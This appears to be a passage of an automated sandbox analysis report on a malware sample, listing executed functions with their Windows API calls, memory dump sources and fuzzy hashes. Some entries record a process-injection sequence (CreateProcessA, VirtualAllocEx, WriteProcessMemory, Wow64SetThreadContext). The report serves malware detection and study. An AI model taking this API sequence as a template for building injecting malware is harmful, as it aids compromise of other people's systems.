                                                        • Instruction Fuzzy Hash: A311C17540D7C09FD7128B25DC85A92BFA0EF03224F0980DBDD858F163D268A909D762
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027707C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,9B09C380,00000000,00000000,00000000,00000000), ref: 02770819
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        • Opcode ID: f6e1e2a7e0328899841cf4adf84f621bc4f3fca65e84b7c8536a8fc1db8b5519
                                                        • Instruction ID: cfba54060b4c06b76d54d1c3190ada49b7fe55bed39866603541c8a449a1280b
                                                        • Opcode Fuzzy Hash: f6e1e2a7e0328899841cf4adf84f621bc4f3fca65e84b7c8536a8fc1db8b5519
                                                        • Instruction Fuzzy Hash: 27018C72500704EFFB209F15DC86BA6FB98EF44720F14C5AAFD099A281D674A904CAB6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027713AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        • Opcode ID: 3c337df2fbd70349ba04bbdd52b9ce842f41aa60e050ba2db19668106489a7b2
                                                        • Instruction ID: b01efd69b88341abe75d8b4ed5c3e86f871e10b7f0ad56a479b67c0b072cd424
                                                        • Opcode Fuzzy Hash: 3c337df2fbd70349ba04bbdd52b9ce842f41aa60e050ba2db19668106489a7b2
                                                        • Instruction Fuzzy Hash: B3118B76600700DFEF20CF56DC85B66FBA4EF04620F48C4AAED498B652D371E418DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01EDAB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01EDABC9
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        • Opcode ID: 4211f7d045416c00409ce62cce321192843d99b3a607a56d441bb45472a100df
                                                        • Instruction ID: d6521ab698e3cd5119936aa1ea3c619f29e42d22746455c0112b024b3ed64a41
                                                        • Opcode Fuzzy Hash: 4211f7d045416c00409ce62cce321192843d99b3a607a56d441bb45472a100df
                                                        • Instruction Fuzzy Hash: 8911C2B55093809FDB11CF25DC85B82BFA4EF42224F0980ABDD498F153D275A508CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01EDBA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01EDBA7E
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 433952c1bfb96aec982b5f9df21f284175bc4faa56707a9a145ddb53102b964f
                                                        • Instruction ID: 5073d10d195a08196b8f6e0dc12b1a924d99fc95a97083ec6f819e13dc89c7ea
                                                        • Opcode Fuzzy Hash: 433952c1bfb96aec982b5f9df21f284175bc4faa56707a9a145ddb53102b964f
                                                        • Instruction Fuzzy Hash: 2911A172500700DFEB21CF55DC44B56FFE4FF09211F0885AAED898A612E371E415DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0277104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0277109E
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        • Opcode ID: 63736144e2c0e17f1e4c8262263ae8b2d5cc7b8926a4166839b5bc7adde56518
                                                        • Instruction ID: 108b9bcd344a29c965451b8f9c80bb0a97c1655eb9435ff039aa6e4a8c1189b5
                                                        • Opcode Fuzzy Hash: 63736144e2c0e17f1e4c8262263ae8b2d5cc7b8926a4166839b5bc7adde56518
                                                        • Instruction Fuzzy Hash: C5017171900600ABE310DF26DC46B66FBA8FB84A60F14816AED089B741D235B515CBE5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 027701D0
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        • Opcode ID: 625b248337ac2a271ab065eefe71b7273a3221a80f6a25da34fc9ce92d5c85ea
                                                        • Instruction ID: 94dee6ee7b4b3364957d4652e1fe503bd49504842a39e5ae992e495575b12207
                                                        • Opcode Fuzzy Hash: 625b248337ac2a271ab065eefe71b7273a3221a80f6a25da34fc9ce92d5c85ea
                                                        • Instruction Fuzzy Hash: BF015E726047449FEB10DF65DC8576AFB98EB01621F18C4AADC09CB642D674E404CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01EDA1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01EDA23E
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        • Opcode ID: 35470f553b02f406047f08668e51472b3625135f6422c96d180394c15d40c813
                                                        • Instruction ID: 88884ed213ac1cf455d7bbc4b3976612b8971f2c42ab2358089441fbc071a5fe
                                                        • Opcode Fuzzy Hash: 35470f553b02f406047f08668e51472b3625135f6422c96d180394c15d40c813
                                                        • Instruction Fuzzy Hash: 16018471900600AFE310DF26DC46B66FBE8FB84A60F14816AED089B741D235F515CBE5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027712FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0277132F
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        • Opcode ID: 03a2dbe533d998ed1db6c2dcc28a5ed9dcfa3f26fd6cac693c34bed9922feda4
                                                        • Instruction ID: bb17ba439875faf00ff4586f0fbaeff984b62342b02c8b8ff9881f44b94c50c0
                                                        • Opcode Fuzzy Hash: 03a2dbe533d998ed1db6c2dcc28a5ed9dcfa3f26fd6cac693c34bed9922feda4
                                                        • Instruction Fuzzy Hash: 6E01DF71904300DFEF20CF15DC857A5FBE4EF04620F48C4AADC098B642D275A404CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01EDBAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleScreenBufferInfo.KERNEL32 ref: 01EDBB2F
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: BufferConsoleInfoScreen
                                                        • String ID:
                                                        • API String ID: 3437242342-0
                                                        • Opcode ID: 298a28c0a156efb3de2fbae66756b37e606e10bd31af850bb78e6fb44d36a8ad
                                                        • Instruction ID: 5f7601db224e8f79f3eb780b88ab7476bf647d856fc5e175d95f1f859a5ecbf8
                                                        • Opcode Fuzzy Hash: 298a28c0a156efb3de2fbae66756b37e606e10bd31af850bb78e6fb44d36a8ad
                                                        • Instruction Fuzzy Hash: 6101DF71900600DFEB20CF19DC857A9FBA4EF05620F08C4AADD4A8F256E275E804CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02770FB0
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        • Opcode ID: 874cf956b4be8fb95213fb5e0f111c03c22168dc9ce788cfded554ed13ddf501
                                                        • Instruction ID: 9ffc730d70776059fa0bc935efd4e7f7a9ed8e36331b0faeb09ac7fee703634a
                                                        • Opcode Fuzzy Hash: 874cf956b4be8fb95213fb5e0f111c03c22168dc9ce788cfded554ed13ddf501
                                                        • Instruction Fuzzy Hash: 8E017871904340DFEB20DF25D885B66FBA4EB02620F08C4AADC09CF246E374E408CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027704B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02770502
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        • Opcode ID: 067eb8202c730153ef101ac0dc2b04fb21c6a7f6d813acdd17f0099d110d0f71
                                                        • Instruction ID: 5e5602edf029783ffade02a6d16a98436af7bc47fdfcef287091bc86f285b411
                                                        • Opcode Fuzzy Hash: 067eb8202c730153ef101ac0dc2b04fb21c6a7f6d813acdd17f0099d110d0f71
                                                        • Instruction Fuzzy Hash: E3016271900600ABD314DF16DC46B26FBA8FB88B20F14815AED085B741D275F515CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01EDA8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01EDA94A
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        • Opcode ID: 2c3ae6f0e905c7d8c7fd1e585d95a40a9db3d0b3a3b37f95f808999cabc2d2fb
                                                        • Instruction ID: f1a7827c85a7d22381e33ec29704ebc5477c2ecf08390093d7e79f10dd647e52
                                                        • Opcode Fuzzy Hash: 2c3ae6f0e905c7d8c7fd1e585d95a40a9db3d0b3a3b37f95f808999cabc2d2fb
                                                        • Instruction Fuzzy Hash: 03016271900600ABD314DF16DC46B26FBA8FB88B20F14815AED085B741D275F515CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0277060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02770640
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        • Opcode ID: af184114e5237f6227cca0441502a7e1a38b5117a68a8d79617da9311286b796
                                                        • Instruction ID: 29326d5933adeff249addc0bd4fa717df5a6370d3899bf634f75bc5ca07e84ce
                                                        • Opcode Fuzzy Hash: af184114e5237f6227cca0441502a7e1a38b5117a68a8d79617da9311286b796
                                                        • Instruction Fuzzy Hash: A101FF35600700DFEF208F15D889761FBA0EF41620F08C0AAEC498B752D274E808DAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01EDAB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01EDABC9
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        • Opcode ID: 422d38370835a887e39bd8e26fc6e159bffb8be02932bf5ce958d25e4db624ce
                                                        • Instruction ID: ba1492d8c5b7cf367c15fd514200c1401e75e5bfb819c9ea2827d9b00cb178be
                                                        • Opcode Fuzzy Hash: 422d38370835a887e39bd8e26fc6e159bffb8be02932bf5ce958d25e4db624ce
                                                        • Instruction Fuzzy Hash: B501F431504340DFEB10DF19DC85799FB94EF44220F48C4BBDD098F202D275A505CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02771116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02771148
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        • Opcode ID: 4ab3f98cdc328466404931d8147cfc1f2945cc5a55af28ae0b6afa9bb7718117
                                                        • Instruction ID: 9be79c7b8dbc40574f27890e0dfdd0505e4f0ab6e8ca728c880338719d3dd181
                                                        • Opcode Fuzzy Hash: 4ab3f98cdc328466404931d8147cfc1f2945cc5a55af28ae0b6afa9bb7718117
                                                        • Instruction Fuzzy Hash: E7F0AF35504740DFEB20CF05D885765FBA4EF05A21F88C1DADD495F312D675A544CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0277096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0277099C
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: 364c4cb61adc52f32a66c2f6c4bf4ae0d4aa34c95093f613d871d519bda35673
                                                        • Instruction ID: 42114844d409793a1489ce5a56dc72bd75513dc01f3b4daca8193bcc599e7faa
                                                        • Opcode Fuzzy Hash: 364c4cb61adc52f32a66c2f6c4bf4ae0d4aa34c95093f613d871d519bda35673
                                                        • Instruction Fuzzy Hash: B2F0CD35904740DFEF20DF16D889766FBA0EF15721F08C09ADD894B316D375A408CEA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01EDA36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: Flags
                                                        • String ID:
                                                        • API String ID: 3401871038-0
                                                        • Opcode ID: 50dd8b0daa52cdf091227a7d7477999feb247e6bffc7a0e1dc3623ef7b22f21c
                                                        • Instruction ID: ac751dac9f14fb0742cecabae4652eeb94ab8831563759df2116f3ce9ff731f9
                                                        • Opcode Fuzzy Hash: 50dd8b0daa52cdf091227a7d7477999feb247e6bffc7a0e1dc3623ef7b22f21c
                                                        • Instruction Fuzzy Hash: 44F0C235504740DFEB20DF05D885769FBA1EF44725F08D0AADD494B312D7B5E504CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01EDAA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01EDAA71
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        • Opcode ID: d5014ee3fae05ee799c046b32d660d652a635b9193196f57eca6305b334f5da0
                                                        • Instruction ID: e047eb55094e57357f3b253fb9da7ec69ee9cb42af8f3820dcdd4b5336990a88
                                                        • Opcode Fuzzy Hash: d5014ee3fae05ee799c046b32d660d652a635b9193196f57eca6305b334f5da0
                                                        • Instruction Fuzzy Hash: 55F0F031904B40DFEB20CF19D989765FBA0EF44625F48C1AADD094F342D278A604CBA3
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01EDA974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01EDA9C8
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: af7aed6ff69d7c1fa03dcf15489197a8aa3749565047f80678abfec6fff07460
                                                        • Instruction ID: 50e294d88ee205401c259cd07119ca8e6cfc5551e85f10a72cca25f3419449a6
                                                        • Opcode Fuzzy Hash: af7aed6ff69d7c1fa03dcf15489197a8aa3749565047f80678abfec6fff07460
                                                        • Instruction Fuzzy Hash: DE11A3715093809FD712CF25DC45B96FFA4EF42224F0980EBED858F253D275A908CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01EDA996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01EDA9C8
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: b122a227046a8e5accae7fd7b0f0ba9b24f46a352a60eb09a286142a743b1f57
                                                        • Instruction ID: 54645fb55086bdb158b938184ab36d8ebe6bf616541d4ea53451547c0d5c34ec
                                                        • Opcode Fuzzy Hash: b122a227046a8e5accae7fd7b0f0ba9b24f46a352a60eb09a286142a743b1f57
                                                        • Instruction Fuzzy Hash: A801A275604740DFEB10DF19EC857AAFB94EF44224F08C4BBDD098B646D675A904CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01ED23F4, Relevance: .0, Instructions: 15COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103629358.0000000001ED2000.00000040.00000001.sdmp, Offset: 01ED2000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: edbd2b1e7bb8a1ddaf5e1575877e5f6c1962d0518fcdf2f836eb03f42f1db2f0
                                                        • Instruction ID: 182a43f6da750850907c47248871d24d55cfb21c0b65f3c5a7e829d67e0484f3
                                                        • Opcode Fuzzy Hash: edbd2b1e7bb8a1ddaf5e1575877e5f6c1962d0518fcdf2f836eb03f42f1db2f0
                                                        • Instruction Fuzzy Hash: E7D05E79205A828FE7178A1CC1A4B993BA4AF55B08F4644F9ED40CB6A3C768E582E200
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01ED23BC, Relevance: .0, Instructions: 14COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103629358.0000000001ED2000.00000040.00000001.sdmp, Offset: 01ED2000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3843541aa74486b0ce151906f95e6670a256147bba24f0847ef17bf4ee30f878
                                                        • Instruction ID: 83bcc1d1da789d200c8213085a9af2029844ebfd330c586633dfbad7f1b65cd2
                                                        • Opcode Fuzzy Hash: 3843541aa74486b0ce151906f95e6670a256147bba24f0847ef17bf4ee30f878
                                                        • Instruction Fuzzy Hash: 27D05E343006828FEB15CA1CC594F5D77E4AF80704F0654E8BD008B266C7A4E881C600
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Analysis Process: 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe PID: 2888 Parent PID: 2692 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeCOMMON

                                                        Executed Functions

                                                        Function 002F3B30, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 002F3BB6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2164991469.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID: I1
                                                        • API String ID: 983334009-834463369
                                                        • Opcode ID: c5bdc3301b4d7de1d11c46891ae688bcbfc92ad0b51ca49d8fbbd37b3a06b59a
                                                        • Instruction ID: 539dfff9b4c9715dcdd71223fa90b6b4154009c1c3d56ebc4e950a6350e798d3
                                                        • Opcode Fuzzy Hash: c5bdc3301b4d7de1d11c46891ae688bcbfc92ad0b51ca49d8fbbd37b3a06b59a
                                                        • Instruction Fuzzy Hash: 9E215971D002098FCB10CFA9C8947EEFBF4AF48318F54882AD919A7240D7789A44CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 002F1888, Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • KiUserExceptionDispatcher.NTDLL ref: 002F18A8
                                                        • KiUserExceptionDispatcher.NTDLL ref: 002F18BA
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2164991469.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                        Similarity
                                                        • API ID: DispatcherExceptionUser
                                                        • String ID:
                                                        • API String ID: 6842923-0
                                                        • Opcode ID: aacd02bbee9082039b25e6b8bc4bdc23e80ffb2be0b97d3e344da45811cadac6
                                                        • Instruction ID: 416ab3d7334aa039ab8525ab83d99d4432acfb279baf2fefc36a78a46606136d
                                                        • Opcode Fuzzy Hash: aacd02bbee9082039b25e6b8bc4bdc23e80ffb2be0b97d3e344da45811cadac6
                                                        • Instruction Fuzzy Hash: 1EE04FB0E04208CFC744EFA8EA4456EBBF0FB48304B5045AAC809D7B44E7305E61CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 002F4B58, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002F4D8E
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2164991469.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: f11c38e899d16c250df34801fdd4c524fd2b63ca3a6637a598330bfb743e4ed1
                                                        • Instruction ID: ccd9c29e772ec987f927cdf0946e8d2029d4baa0833bd33f7b24c68ae181b66f
                                                        • Opcode Fuzzy Hash: f11c38e899d16c250df34801fdd4c524fd2b63ca3a6637a598330bfb743e4ed1
                                                        • Instruction Fuzzy Hash: 2B917970D1121D8FDB14DFA8C841BEEFBB2BF48344F14856AD908A7280DBB49A95CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 002F42D0, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 002F4360
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2164991469.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 6c3f027586371e13cb05a89ad281ade37bd40bf4f80a2d497e3c94a34e014f8c
                                                        • Instruction ID: 76b0d3469498bd38811b763a9f61cf22ab30041af6712e656b115b5130ec49c8
                                                        • Opcode Fuzzy Hash: 6c3f027586371e13cb05a89ad281ade37bd40bf4f80a2d497e3c94a34e014f8c
                                                        • Instruction Fuzzy Hash: E12128759002199FCB10DFA9C885BEEBBF5FF48314F10882AE919A7240D7789950CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 002F45B9, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002F4640
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2164991469.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: 3744d3ffaa13a9271db8fbfa49e983efb2876bfeebfe31be9f8a5bbb445814a9
                                                        • Instruction ID: 5cc7613449a3f9ab86e55a8f42d27f71c4412a28d683742803dfcbf24d1f8b85
                                                        • Opcode Fuzzy Hash: 3744d3ffaa13a9271db8fbfa49e983efb2876bfeebfe31be9f8a5bbb445814a9
                                                        • Instruction Fuzzy Hash: 1C2128719006199FCF10CFA9C884BEEFBF5FF48314F50882AEA19A7250D7789950DBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 002F45C0, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002F4640
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2164991469.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: f626a51ed31809813e8fbb845519e8bf718998c79299589607e32ba5e53b7eae
                                                        • Instruction ID: 440175ae24c42f0bfc8713899a4a7222172b59039ce83a159a95fe0e5188b24b
                                                        • Opcode Fuzzy Hash: f626a51ed31809813e8fbb845519e8bf718998c79299589607e32ba5e53b7eae
                                                        • Instruction Fuzzy Hash: 052128719006199FCB10CFA9C884BEEFBF5FF48314F50882AEA19A7250D7789950DBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 002F3B38, Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 002F3BB6
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2164991469.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: 3d7a02f0d045017cdde58afe96c3bf581899006d76d08a7e572183faf9727223
                                                        • Instruction ID: b62b8ae69cb0c3a2065785f1ceb3f18c1e62928b2fcfea0c6faed0910a4b00a1
                                                        • Opcode Fuzzy Hash: 3d7a02f0d045017cdde58afe96c3bf581899006d76d08a7e572183faf9727223
                                                        • Instruction Fuzzy Hash: 12214971D002098FCB10CFA9C4847EEFBF4EF48358F54882AD519A7240DB78AA44CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 002F4010, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 002F407E
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2164991469.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 8d9eb0ca1ffea62a1430733a5b648e3a5dd3fdd48d6f602dd94b68f9d013d1df
                                                        • Instruction ID: 894c1b9a79916267068c555ed1b858e1423da0229bc393fa351423163ae874a9
